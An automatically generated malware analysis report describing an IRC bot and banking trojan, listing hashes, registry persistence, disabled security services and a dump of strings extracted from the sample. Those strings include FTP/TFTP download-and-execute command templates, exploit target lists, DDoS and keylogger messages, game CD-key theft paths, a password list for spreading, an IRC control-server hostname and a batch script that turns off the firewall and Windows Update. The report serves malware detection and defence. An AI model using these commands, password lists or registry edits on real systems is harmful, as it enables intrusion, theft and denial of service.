Trojan.GenericKD.2255314_a40a092a26

by malwarelabrobot on April 13th, 2015 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.GenericKD.2255314 (B) (Emsisoft), Trojan.GenericKD.2255314 (AdAware), BackdoorIRC.YR, GenericIRCBot.YR, BankerGeneric.YR (Lavasoft MAS)
Behaviour: Banker, Trojan, Backdoor, IRCBot


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: a40a092a264abbb7b3e4255d28696b91
SHA1: 9865b8e3c3be27da564ffb9b4c0459cf519e7c2a
SHA256: d4786fb38a2129464e1e248a17d3669677ca4d000b2e905671eb764f64ec3e8a
SSDeep: 3072:f0qW0qYDp49oQr/Mf97Cosbgo3RDDn0GuDkq10fYHTvG2w9IyherhZzkgSA:JDO9wfkQOP0G2 gvGfeygzkg
Size: 344064 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: NsPackv23, NsPackV2X, PolyEnE001byLennartHedlund, UPolyXv05_v6
Company: no certificate found
Created at: 2004-08-04 09:01:37
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Behaviour: IRCBot
Description: A bot can communicate with command and control servers via an IRC channel.


Process activity

The Trojan creates the following process(es):

explore.exe:1452
%original file name%.exe:1808
regedit.exe:640

The Trojan injects its code into the following process(es):

explore.exe:464

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process explore.exe:464 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\a.bat (5 bytes)

The process explore.exe:1452 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\5UP6LBPK\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\PX0R9ZUJ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S8PZTGPI\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\JB2UPCO0\desktop.ini (67 bytes)
%System%\explore.exe (601 bytes)
C:\a.bat (5 bytes)

The process %original file name%.exe:1808 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\explore.exe (2712 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\explore.exe (0 bytes)

Registry activity

The process explore.exe:464 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\System\CurrentControlSet\Control\Lsa]
"RestrictAnonymous" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\OLE]
"1337 virus" = "explore.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C8 B3 5A 8F 50 08 9D 06 0A 42 C7 51 FB 33 A6 3B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Ole]
"EnableDCOM" = "N"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runservices]
"1337 virus" = "explore.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"1337 virus" = "explore.exe"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process explore.exe:1452 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "79 65 44 72 A2 8F 48 88 7F 6F FD 14 DF 69 17 86"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

The process %original file name%.exe:1808 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 4D EA 84 83 44 F4 EA 0E 51 9A 7D 79 97 01 9D"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"wextract_cleanup0" = "rundll32.exe %System%\advpack.dll,DelNodeRunDLL32 C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\"

The Trojan deletes the following value(s) in system registry:
The Trojan disables automatic startup of the application by deleting the following autorun value:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"wextract_cleanup0"

The process regedit.exe:640 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9C AD 2D 77 76 71 24 9E 3B 93 E5 F9 6B 73 95 F0"

[HKLM\System\CurrentControlSet\Services\NetBT\Parameters]
"TransportBindName" = ""

The following service is disabled:

[HKLM\System\CurrentControlSet\Services\wuauserv]
"Start" = "4"

[HKLM\System\CurrentControlSet\Services\SharedAccess]
"Start" = "4"

Dropped PE files

MD5 File path
9bcf175d62ffc1746167ce475ae6190f c:\WINDOWS\system32\explore.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: Microsoft Corporation
Product Name: HD Player
Product Version: 6.00.2900.2180
Legal Copyright: (c) Microsoft Corporation. All rights reserved.
Legal Trademarks:
Original Filename: WEXTRACT.EXE
Internal Name: Wextract
File Version: 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)
File Description: Win32 Cabinet Self-Extractor
Comments:
Language: Language Neutral

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
4096 188416 188416 0.009375 07f4b8fac5debeee351dd0f8bd3d61d3
192512 151552 151552 5.37114 f04c59b55923ed2fa5857d1aca96a8a6

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

No activity has been detected.

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

Web Traffic was not found.

The Trojan connects to the servers at the following location(s):

explore.exe_464:

GWSSh
t1SSSSh
PSSh<LA
GET / HTTP/1.0
Host: %s
Authorization: Negotiate %s
__MSVCRT_HEAP_SELECT
Send error: <%d>.
ddos.random
ddos.ack
ddos.syn
Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.
Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).
Error: setsockopt() failed, returned: <%d>.
Error: socket() failed, returned: <%d>.
] (tcp.p
] (keylog.p
[%d-%d-%d %d:%d:%d] %s
%s (Return) (%s)
%s (Buffer full) (%s)
%s (Changed Windows: %s)
:.login
:,login
:!login
:@login
:$login
:%login
:^login
:&login
:*login
:-login
: login
:/login
:\login
:=login
:?login
:'login
:`login
:~login
: login
:.auth
:.hashin
:.secure
:.syn
:%syn
CDKey
JOIN #
NICK
now an IRC Operator
paypal.com
PAYPAL.COM
Error: recv() failed, returned: <%d>
Suspicious %s packet from: %s:%d - %s.
Error: WSAIoctl() failed, returned: <%d>.
Error: bind() failed, returned: <%d>.
] (%s.p
trying to root %s
] (tPTF.p
transfer complete to IP: %s
\\%s\pipe\epmapper
Windows for Workgroups 3.1a
WinXP Professional [universal] lsass.exe
Win2k Professional [universal] netrap.dll
Win2k Advanced Server [SP4] netrap.dll
echo open %s %d > o&echo user 1 1 >> o &echo get %s >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &%s
tftp -i %s get %s
\\%s\ipc$
] (%s.e
cmd /k echo open %s %d > o&echo user 1 1 >> o &echo get %s >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &%s
Windows uk 2k3 ee sp0 24
Windows uk 2k3 ee sp0 23
Windows uk 2k3 ee sp0 22
Windows uk 2k3 ee sp0 21
Windows uk 2k3 ee sp0 20
Windows uk 2k3 ee sp0 19
Windows uk 2k3 ee sp0 18
Windows uk 2k3 ee sp0 17
Windows uk 2k3 ee sp0 16
Windows uk 2k3 ee sp0 15
Windows uk 2k3 ee sp0 14
Windows uk 2k3 ee sp0 13
Windows uk 2k3 ee sp0 12
Windows uk 2k3 ee sp0 11
Windows uk 2k3 ee sp0 10
Windows uk 2k3 ee sp0 9
Windows uk 2k3 ee sp0 8
Windows uk 2k3 ee sp0 7
Windows uk 2k3 ee sp0 6
Windows uk 2k3 ee sp0 5
Windows uk 2k3 ee sp0 4
Windows uk 2k3 ee sp0 3
Windows uk 2k3 ee sp0 2
Windows uk 2k3 ee sp0 1
Windows uk 2k3 se sp0 24
Windows uk 2k3 se sp0 23
Windows uk 2k3 se sp0 22
Windows uk 2k3 se sp0 21
Windows uk 2k3 se sp0 20
Windows uk 2k3 se sp0 19
Windows uk 2k3 se sp0 18
Windows uk 2k3 se sp0 17
Windows uk 2k3 se sp0 16
Windows uk 2k3 se sp0 15
Windows uk 2k3 se sp0 14
Windows uk 2k3 se sp0 13
Windows uk 2k3 se sp0 12
Windows uk 2k3 se sp0 11
Windows uk 2k3 se sp0 10
Windows uk 2k3 se sp0 9
Windows uk 2k3 se sp0 8
Windows uk 2k3 se sp0 7
Windows uk 2k3 se sp0 6
Windows uk 2k3 se sp0 5
Windows uk 2k3 se sp0 4
Windows uk 2k3 se sp0 3
Windows uk 2k3 se sp0 2
Windows uk 2k3 se sp0 1
Windows uk xp pro sp1 25
Windows uk xp pro sp1 24
Windows uk xp pro sp1 23
Windows uk xp pro sp1 22
Windows uk xp pro sp1 21
Windows uk xp pro sp1 20
Windows uk xp pro sp1 19
Windows uk xp pro sp1 18
Windows uk xp pro sp1 17
Windows uk xp pro sp1 16
Windows uk xp pro sp1 15
Windows uk xp pro sp1 14
Windows uk xp pro sp1 13
Windows uk xp pro sp1 12
Windows uk xp pro sp1 11
Windows uk xp pro sp1 10
Windows uk xp pro sp1 9
Windows uk xp pro sp1 8
Windows uk xp pro sp1 7
Windows uk xp pro sp1 6
Windows uk xp pro sp1 5
Windows uk xp pro sp1 4
Windows uk xp pro sp1 3
Windows uk xp pro sp1 2
Windows uk xp pro sp1 1
Windows 2000 SP4 GER FAT32
Windows nl sp1 23
Windows nl sp1 22
Windows nl sp1 21
Windows nl sp1 20
Windows nl sp1 19
Windows nl sp1 18
Windows nl sp1 17
Windows nl sp1 16
Windows nl sp1 15
Windows nl sp1 14
Windows nl sp1 13
Windows nl sp1 12
Windows nl sp1 11
Windows nl sp1 10
Windows nl sp1 9
Windows nl sp1 8
Windows nl sp1 7
Windows nl sp1 6
Windows nl sp1 5
Windows nl sp1 4
Windows nl sp1 3
Windows nl sp1 2
Windows nl sp1 1
Windows XP SP0 1 ENG
Windows XP SP0 1 GER NL IT FR
\\%s\pipe\wkssvc
%s, port:%d now executing %s on remote machine.
200 PORT command successful.
%s.%s.%s.%s
PORT
425 Passive not supported on this server
215 NzmxFtpd
331 Password required
%s %s
220 NzmxFtpd 0wns j0
] (httpd.p
Error: server failed, returned: <%d>.
HTTP/1.0 200 OK
Content-Type: %s
Date: %s %s GMT
Last-Modified: %s %s GMT
Expires: %s %s GMT
Failed to start worker thread, error: <%d>.
Worker thread of server thread: %d.
PRIVMSG %s :Found %s Files and %s Directories
<TD WIDTH="%d"><CODE>%s</CODE></TD>
<TD WIDTH="%d" ALIGN="right"><CODE>%dk</CODE></TD>
"><CODE>%s</CODE></A>
PRIVMSG %s :%-31s %-21s (%s bytes)
<TD WIDTH="%d" ALIGN="right"><CODE>-</CODE></TD>
"><CODE>%s/</CODE></A>
%s%s/
<TD WIDTH="%d"><A HREF="
PRIVMSG %s :%-31s %-21s
%2.2d/%2.2d/M %2.2d:%2.2d %s
<TD COLSPAN="3"><A HREF="%s"><CODE>Parent Directory</CODE></A></TD>
Searching for: %s
<TD WIDTH="%d"><CODE>Name</CODE></TD>
<TD WIDTH="%d"><CODE>Last Modified</CODE></TD>
<TD WIDTH="%d" ALIGN="right"><CODE>Size</CODE></TD>
<H1>Index of %s</H1>
<TITLE>Index of %s</TITLE>
PRIVMSG %s :Searching for: %s
%s %s HTTP/1.1
Referer: %s
transfer to %s
, info: (%s).
File not found: %s (%s).
Failed to open file: %s.
Total: %d in %s.
%s: %d,
] (portscan.p
Current IP: %s.
Failed to start server, error: <%d>.
Server listening on IP: %s:%d, Directory: %s\.
] (PTF.p
Server started on Port: %d, File: %s, Request: %s.
%d.%d.%d.%d
IP: %s, Port %d is open.
IP: %s:%d, Scan thread: %d, Sub-thread: %d.
Finished at %s:%d after %d minute(s) of scanning.
%s:%d, Scan thread: %d, Sub-thread: %d.
Failed to start client thread, error: <%d>.
Client connection from IP: %s:%d, Server thread: %d.
Failed to start connection thread, error: <%d>.
Client connection to IP: %s:%d, Server thread: %d.
Failed to start server on Port %d.
Failed to start client thread, error: <%d>.
Client connection from IP: %s:%d, Server thread: %d.
Server started on: %s:%d.
Error: Failed to connect to target, returned: <%d>.
Error: Failed to open socket(), returned: <%d>.
Authentication failed. Remote userid: %s != %s.
Key3=
Key2=
Key1=
nwncdkey.ini
base\mp\sof2key
Chrome
Software\Techland\Chrome
Software\Electronic Arts\EA Sports\Nascar Racing 2003\ergc
Software\Electronic Arts\EA Sports\Nascar Racing 2002\ergc
Software\Electronic Arts\EA Sports\NHL 2003\ergc
Software\Electronic Arts\EA Sports\NHL 2002\ergc
Software\Electronic Arts\EA Sports\FIFA 2003\ergc
Software\Electronic Arts\EA Sports\FIFA 2002\ergc
Global Operations
Software\Electronic Arts\EA GAMES\Global Operations\ergc
Microsoft Windows Product ID
Software\Microsoft\Windows\CurrentVersion
prvkey
CDKey
%s\%s
%s CD Key: (%s).
Files found: %d.
Searching for file: %s.
Found: %s\%s
avicap32.dll
SQLDisconnect
SQLFreeHandle
SQLAllocHandle
SQLExecDirect
SQLSetEnvAttr
SQLDriverConnect
odbc32.dll
ShellExecuteA
shell32.dll
mpr.dll
iphlpapi.dll
dnsapi.dll
netapi32.dll
icmp.dll
Mozilla/4.0 (compatible)
InternetCrackUrlA
InternetOpenUrlA
HttpSendRequestA
HttpOpenRequestA
wininet.dll
ws2_32.dll
gdi32.dll
RegCloseKey
RegCreateKeyExA
RegOpenKeyExA
advapi32.dll
GetKeyState
GetAsyncKeyState
ExitWindowsEx
user32.dll
kernel32.dll
Avicap32.dll failed. <%d>
Odbc32.dll failed. <%d>
Shell32.dll failed. <%d>
Mpr32.dll failed. <%d>
Iphlpapi.dll failed. <%d>
Dnsapi.dll failed. <%d>
Netapi32.dll failed. <%d>
Icmp.dll failed. <%d>
Wininet.dll failed. <%d>
Ws2_32.dll failed. <%d>
Gdi32.dll failed. <%d>
Advapi32.dll failed. <%d>
User32.dll failed. <%d>
Kernel32.dll failed. <%d>
%s Error: %s <%d>.
explorer.exe
%%comspec%% /c %s %s
del "%s"
%sdel.bat
c:\a.bat
Echo REGEDIT4>%temp%\1.reg
Echo.>>%temp%\1.reg
Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]>>%temp%\1.reg
Echo "TransportBindName"="">>%temp%\1.reg
Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]>>%temp%\1.reg
Echo "Start"=dword:00000004>>%temp%\1.reg
Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]>>%temp%\1.reg
Echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc]>>%temp%\1.reg
Echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole]>>%temp%\1.reg
Echo "EnableDCOM"="N">>%temp%\1.reg
Echo "EnableRemoteConnect"="N">>%temp%\1.reg
Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]>>%temp%\1.reg
Echo "restrictanonymous"=dword:00000001>>%temp%\1.reg
Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\PCT1.0\Server]>>%temp%\1.reg
Echo "Enabled"=hex:00>>%temp%\1.reg
Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]>>%temp%\1.reg
Echo "AutoShareWks"=dword:00000000>>%temp%\1.reg
Echo "AutoShareServer"=dword:00000000>>%temp%\1.reg
Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]>>%temp%\1.reg
Echo "NameServer"="">>%temp%\1.reg
Echo "ForwardBroadcasts"=dword:00000000>>%temp%\1.reg
Echo "IPEnableRouter"=dword:00000000>>%temp%\1.reg
Echo "Domain"="">>%temp%\1.reg
Echo "SearchList"="">>%temp%\1.reg
Echo "UseDomainNameDevolution"=dword:00000001>>%temp%\1.reg
Echo "EnableICMPRedirect"=dword:00000000>>%temp%\1.reg
Echo "DeadGWDetectDefault"=dword:00000001>>%temp%\1.reg
Echo "DontAddDefaultGatewayDefault"=dword:00000000>>%temp%\1.reg
Echo "EnableSecurityFilters"=dword:00000001>>%temp%\1.reg
Echo "AllowUnqualifiedQuery"=dword:00000000>>%temp%\1.reg
Echo "PrioritizeRecordData"=dword:00000001>>%temp%\1.reg
Echo "TCP1320Opts"=dword:00000003>>%temp%\1.reg
Echo "KeepAliveTime"=dword:00023280>>%temp%\1.reg
Echo "BcastQueryTimeout"=dword:000002ee>>%temp%\1.reg
Echo "BcastNameQueryCount"=dword:00000001>>%temp%\1.reg
Echo "CacheTimeout"=dword:0000ea60>>%temp%\1.reg
Echo "Size/Small/Medium/Large"=dword:00000003>>%temp%\1.reg
Echo "LargeBufferSize"=dword:00001000>>%temp%\1.reg
Echo "SynAckProtect"=dword:00000002>>%temp%\1.reg
Echo "PerformRouterDiscovery"=dword:00000000>>%temp%\1.reg
Echo "EnablePMTUBHDetect"=dword:00000000>>%temp%\1.reg
Echo "FastSendDatagramThreshold "=dword:00000400>>%temp%\1.reg
Echo "StandardAddressLength "=dword:00000018>>%temp%\1.reg
Echo "DefaultReceiveWindow "=dword:00004000>>%temp%\1.reg
Echo "DefaultSendWindow"=dword:00004000>>%temp%\1.reg
Echo "BufferMultiplier"=dword:00000200>>%temp%\1.reg
Echo "PriorityBoost"=dword:00000002>>%temp%\1.reg
Echo "IrpStackSize"=dword:00000004>>%temp%\1.reg
Echo "IgnorePushBitOnReceives"=dword:00000000>>%temp%\1.reg
Echo "DisableAddressSharing"=dword:00000000>>%temp%\1.reg
Echo "AllowUserRawAccess"=dword:00000000>>%temp%\1.reg
Echo "DisableRawSecurity"=dword:00000000>>%temp%\1.reg
Echo "DynamicBacklogGrowthDelta"=dword:00000032>>%temp%\1.reg
Echo "FastCopyReceiveThreshold"=dword:00000400>>%temp%\1.reg
Echo "LargeBufferListDepth"=dword:0000000a>>%temp%\1.reg
Echo "MaxActiveTransmitFileCount"=dword:00000002>>%temp%\1.reg
Echo "MaxFastTransmit"=dword:00000040>>%temp%\1.reg
Echo "OverheadChargeGranularity"=dword:00000001>>%temp%\1.reg
Echo "SmallBufferListDepth"=dword:00000020>>%temp%\1.reg
Echo "SmallerBufferSize"=dword:00000080>>%temp%\1.reg
Echo "TransmitWorker"=dword:00000020>>%temp%\1.reg
Echo "DNSQueryTimeouts" =hex(7):31,00,00,00,32,00,00,00,32,00,00,00,34,00,00,00,38,00,00,00,30,00,00,00,00,00>>%temp%\1.reg
Echo "DefaultRegistrationTTL"=dword:00000014>>%temp%\1.reg
Echo "DisableReplaceAddressesInConflicts"=dword:00000000>>%temp%\1.reg
Echo "DisableReverseAddressRegistrations"=dword:00000001>>%temp%\1.reg
Echo "UpdateSecurityLevel "=dword:00000000>>%temp%\1.reg
Echo "DisjointNameSpace"=dword:00000001>>%temp%\1.reg
Echo "QueryIpMatching"=dword:00000000>>%temp%\1.reg
Echo "NoNameReleaseOnDemand"=dword:00000001>>%temp%\1.reg
Echo "EnableDeadGWDetect"=dword:00000000>>%temp%\1.reg
Echo "EnableFastRouteLookup"=dword:00000001>>%temp%\1.reg
Echo "MaxFreeTcbs"=dword:000007d0>>%temp%\1.reg
Echo "MaxHashTableSize"=dword:00000800>>%temp%\1.reg
Echo "SackOpts"=dword:00000001>>%temp%\1.reg
Echo "Tcp1323Opts"=dword:00000003>>%temp%\1.reg
Echo "TcpMaxDupAcks"=dword:00000001>>%temp%\1.reg
Echo "TcpRecvSegmentSize"=dword:00000585>>%temp%\1.reg
Echo "TcpSendSegmentSize"=dword:00000585>>%temp%\1.reg
Echo "TcpWindowSize"=dword:0007d200>>%temp%\1.reg
Echo "DefaultTTL"=dword:00000030>>%temp%\1.reg
Echo "TcpMaxHalfOpen"=dword:0000004b>>%temp%\1.reg
Echo "TcpMaxHalfOpenRetried"=dword:00000050>>%temp%\1.reg
Echo "TcpTimedWaitDelay"=dword:00000000>>%temp%\1.reg
Echo "MaxNormLookupMemory"=dword:00030d40>>%temp%\1.reg
Echo "FFPControlFlags"=dword:00000001>>%temp%\1.reg
Echo "FFPFastForwardingCacheSize"=dword:00030d40>>%temp%\1.reg
Echo "MaxForwardBufferMemory"=dword:00019df7>>%temp%\1.reg
Echo "MaxFreeTWTcbs"=dword:000007d0>>%temp%\1.reg
Echo "GlobalMaxTcpWindowSize"=dword:0007d200>>%temp%\1.reg
Echo "EnablePMTUDiscovery"=dword:00000001>>%temp%\1.reg
Echo "ForwardBufferMemory"=dword:00019df7>>%temp%\1.reg
Echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]>>%temp%\1.reg
Echo "MaxConnectionsPer1_0Server"=dword:00000050>>%temp%\1.reg
Echo "MaxConnectionsPerServer"=dword:00000050>>%temp%\1.reg
START /WAIT REGEDIT /S %temp%\1.reg
DEL %temp%\1.reg
Not supported by this system.
Error getting ARP cache: <%d>.
Finished sending pings to %s.
Error sending pings to %s.
] (udp.p
Finished sending packets to %s.
PRIVMSG %s :%s
] (cmd.p
Failed to start IO thread, error: <%d>.
cmd.exe
Ý %dh %dm
[SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB total, %sKB free. [Disk]: %s total, %s free. [OS]: Windows %s (%d.%d, Build %d). [Sysdir]: %s. [Hostname]: %s (%s). [Current User]: %s. [Date]: %s. [Time]: %s. [Uptime]: %s.
%s (%s)
[NETINFO]: [Type]: %s (%s). [IP Address]: %s. [Hostname]: %s.
Failed to connect to HTTP server.
Invalid URL.
Failed to get requested URL from HTTP server.
URL visited.
%d. %s = %s
[%.2d-%.2d-M %.2d:%.2d:%.2d] %s
Transfer complete to IP: %s, Filename: %s (%s bytes).
DCC SEND %s %i %i %i
Transfer complete from IP: %s, Filename: %s (%s bytes).
Bad URL, or DNS Error: %s.
Update failed: Error executing file: %s.
Downloaded %.1fKB to %s @ %.1fKB/sec. Updating.
Opened: %s.
Downloaded %.1f KB to %s @ %.1f KB/sec.
CRC Failed (%d != %d).
Filesize is incorrect: (%d != %d).
Update: %s (%dKB transferred).
File download: %s (%dKB transferred).
Couldn't open file: %s.
%s Drive (%s): %s total, %s free, %s available.
%s Drive (%s): Failed to stat, device not ready.
%s %s :%s
PRIVMSG
%s: No service specified.
Error with service: '%s'. %s
%s service: '%s'.
%s: %s (%s)
The following Windows services are registered:
%s: No share specified.
%s share: '%s'.
%s: Error with share: '%s'. %s
Share list error: %s <%ld>
%s: No username specified.
%s: Error with username: '%s'. %s
%s username: '%s'.
Units Per Week: %d
Max. Storage: %d
User's Language: %d
Country Code: %d
Workstations: %S
Logon Server: %S
Last Logoff: %d
Last Logon: %d
Number of Logins: %d
Bad Password Count: %d
Password Age: %d
Parameters: %S
Home Directory: %S
Auth Flags: %d
Privilege Level: %s
Comment: %S
User Comment: %S
Full Name: %S
Account: %S
Total users found: %d.
User list error: %s <%ld>
The password is shorter than required (or does not meet the password policy requirement.)
The operation is allowed only on the primary domain controller of the domain.
This network request is not supported.
%s <Server: %S> <Message: %S>
irc.kr3wzb4se.info
explore.exe
keys.txt
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\RunServices
supported
windows95
windows98
windowsME
windows2k
WindowsXP
00000000
windows
webpage
supporte
support
smtp
report
passphra
operator
mickey
loginwor
keyword
keyin
keybord
asshole
mypass123
mypass
login
ihavenopass
passwd
88888888
11111111
123456789
12345678
1234567
PASSWORD
roffer v1.2b24 [20031215140650], hXXp://iroffer.org/
*@fbi.gov
Failed to start registry thread, error: <%d>.
Failed to start secure thread, error: <%d>.
Failed to start AV/FW killer thread, error: <%d>.
%s %d "%s"
Connected to %s.
NICK %s
USER %s 0 0 :%s
PASS %s
MODE %s %s
USERHOST %s
%s system.
Failed to start flood thread, error: <%d>.
Flooding: (%s:%s) for %s seconds.
Uploading file: %s to: %s failed.
Uploading file: %s to: %s
PTF.exe
-s:%s
open %s
put %s
%s\%i%i%i.dll
File not found: %s.
web.PTF.ul
web.hcon
15 Message sent to %s.
helo $rndnick
mail from: <%s>
rcpt to: <%s>
subject: %s
from: %s
web.email
%s %s flooding: (%s:%s) for %s seconds.
rape.tf
ICMP.dll not available
